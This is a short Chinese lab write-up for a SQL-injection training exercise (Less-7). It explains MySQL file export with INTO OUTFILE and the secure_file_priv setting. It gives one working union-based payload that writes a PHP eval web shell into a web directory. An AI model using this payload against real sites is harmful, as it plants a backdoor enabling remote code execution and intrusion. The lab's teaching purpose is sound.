Less-7导出文件GET字符型注入
什么是导出文件?
1、在本实验开始的0x2 sql注入基础知识就有介绍LOAD_FILE的用法,大家可以翻回去看看!另外在构建环境之初,由于是Linux系统,对这个目录的权限控制的很严谨。
2、所以在我们的payload中只能在/home/wwwroot/default/mysql才能写入或者读取文件!因为mysql目录的权限我们设置chowm -R mysql:mysql
3、另外要保证正常的文件写入与读取要在mysql配置文件my.cnf最后一行新增secure_file_priv= "/"方法,才能使用LOAD_FILE在生产环境情况下,不知道哪个胆肥的会开启这个方法~
1、利用写入新增任意文件
payload
?id=-1')) union select 1,2,'<?php eval($_POST["cmd"]);?>' into outfile "/home/wwwroot/default/mysql/1.txt" --+2、验证是否写入成功
一、执行payload
二、访问写入的文件mysql/1.txt
接下进行下一个实验Less-11基于错误的POST单引号字符型注入
特别说明:
Less-8布尔型单引号GET盲注
Less-9基于时间的GET单引号盲注
Less-10基于时间的GET双引号盲注